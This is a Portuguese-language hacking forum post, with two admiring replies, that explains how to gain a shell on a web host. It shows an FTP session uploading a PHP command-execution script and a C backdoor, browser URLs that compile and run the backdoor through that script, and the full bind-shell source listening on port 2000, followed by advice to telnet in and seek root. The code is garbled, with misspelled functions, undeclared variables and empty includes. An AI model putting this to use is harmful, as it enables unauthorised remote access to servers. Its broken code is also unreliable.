PHP-CGI (Abrindo uma shell por PHP)

[NOVATINHO]

PHP é uma linguagem interpretada,assim como PERL,SHELL Script e etc.
Ela é voltada para aplicações na internet,mais especificamente WEB.

Todo PHP-CGI comeca com ¨mkdir public_html 257 ¨/home/usuario/public_html¨ new directory created.

ftp> cd public_html

250 CWD command successful.

ftp> mkdir cgi

257 ¨/home/usuario/public_html/cgi¨ new directory created.

ftp> chmod 777 cgi

200 CHMOD command successful.

ftp> cd cgi

250 CWD command successful.

ftp> put nlback.c

local : nlback.c remote: nlback.c

200 PORT command sucessful.

150 Opening BINARY mode data connection for t.c.

226 Transfer complete.

1230 bytes sent in 1.00221 secs (1.4e+02 kbytes/sec)

ftp> put out.php

local: out.php remote: out.php

200 PORT command successful.

150 Opening BINARY mode data connection for out.php.

226 Transfer complete.

22 bytes sent in 0.00121 secs (2 kbytes/sec)

ftp> exit

Compile o backdor via browser

[color=blue]http://servidor/~usuario/cgi/outphp.php?cmd=gcc+-o+nlback+
nlback.c

Em seguida execute o backdoor

[color=green]http://servidor/~usuario/cgi/outphp.php?cmd=./nlback

Pronto,você possui uma porta aberta,entao,basta telnet pra ela.Lí dentro,você tenta obter ¨root¨ por outros meios.

Aqui vai um BackDoor que binda SHELL:

________________________nlback.c__________________ ___________

[color=darkblue]#include

#include

#include

#include

#include

#include

#include

#include

#define ERRO -1
/* Mude o numero da porta abaixo * /
#define PORTA 2000


int binda () {
int Meusocket;
struct sockaddr_in hacker;
struct sockadrr_in vitima;
char engana [50] ;
if (fork () == 0) {
vitima.sin_family=AF_INET;
vitima.sin_addr.s_add


r= hton1 (INADDR_ANY) ;
vitima.sin_port= htons (PORTA) ;
bzero ( & (vitima.sin_zero) , 8 ) ;
Meusocket = socket (AF_INET,SOCK_STREAM,0) ;
if (Meusocket < 0) {
fprintf (stderr,¨Erro em socket () !/n¨) ;
exit (ERRO) ;
}

bind (Meusocket, (struct sockaddr *) &vitima,sizeof (vitima) ) ;
if (bind < 0 ) {
fprintf (stderr,¨Erro em bind () !/n¨) ;
exit (ERRO) ;


listem (Meusocket,2) ;
tamanho = sizeof (hacker) ;
conector=accept (Meusocket, (struct sockaddr *) &hacker, &tamanho) ;


if (conector < 0) {
fprintf (stderr,¨Erro em accept () ! /n¨) ;

}

dup2 (conector , 0) ;
dup2 (conector , 1) ;
dup2 (conector , 2) ;
exec1 (¨/bin/sh¨,¨sh¨ , 0) ;

}
}



main () {
binda () ;

}


__________________________________________________ ______________

Espero que tenham gostado ,agora deixa eu descansar e assistir tv rs

[ChaosData]

materia muito interessante! parabens!

[force]

ai legal gostei do codigo fonte d C hehe pra min q to começando é ótimo hehe da pra tentar entender hehe se vc puder colocar mais codigo fonte assim ehhe estarei grato..

Parabéns ai e continua assim

fui flws.